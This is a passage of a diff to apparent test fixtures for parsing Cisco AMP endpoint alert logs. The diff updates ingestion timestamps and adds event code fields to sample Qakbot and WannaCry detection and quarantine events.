malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
+                "code": "1107296272",
                 "kind": "alert",
                 "start": "2021-01-14T20:38:26.000Z",
                 "action": "Executed malware",
@@ -192,8 +194,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420922246Z",
+                "ingested": "2021-09-30T00:14:44.025208580Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6412680266518626000",
@@ -267,8 +270,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420924044Z",
+                "ingested": "2021-09-30T00:14:44.025210946Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6412680266518626000",
@@ -363,8 +367,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420925814Z",
+                "ingested": "2021-09-30T00:14:44.025213319Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412680266518626000",
@@ -456,8 +461,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420927579Z",
+                "ingested": "2021-09-30T00:14:44.025215615Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412680266518626000",
@@ -548,8 +554,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420929335Z",
+                "ingested": "2021-09-30T00:14:44.025217859Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412680266518626000",
@@ -641,8 +648,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420931110Z",
+                "ingested": "2021-09-30T00:14:44.025220104Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412680266518626000",
@@ -714,8 +722,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420932882Z",
+                "ingested": "2021-09-30T00:14:44.025222302Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6412680266518626000",
@@ -785,8 +794,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420934650Z",
+                "ingested": "2021-09-30T00:14:44.025224554Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6412680266518626000",
@@ -856,8 +866,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420936425Z",
+                "ingested": "2021-09-30T00:14:44.025226909Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -931,8 +942,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420938511Z",
+                "ingested": "2021-09-30T00:14:44.025229372Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1006,8 +1018,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420940406Z",
+                "ingested": "2021-09-30T00:14:44.025231667Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1081,8 +1094,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420942187Z",
+                "ingested": "2021-09-30T00:14:44.025233899Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1156,8 +1170,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420943960Z",
+                "ingested": "2021-09-30T00:14:44.025236153Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1231,8 +1246,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420945731Z",
+                "ingested": "2021-09-30T00:14:44.025238376Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1306,8 +1322,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420947589Z",
+                "ingested": "2021-09-30T00:14:44.025240785Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303574240494000",
@@ -1381,8 +1398,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420949381Z",
+                "ingested": "2021-09-30T00:14:44.025243063Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 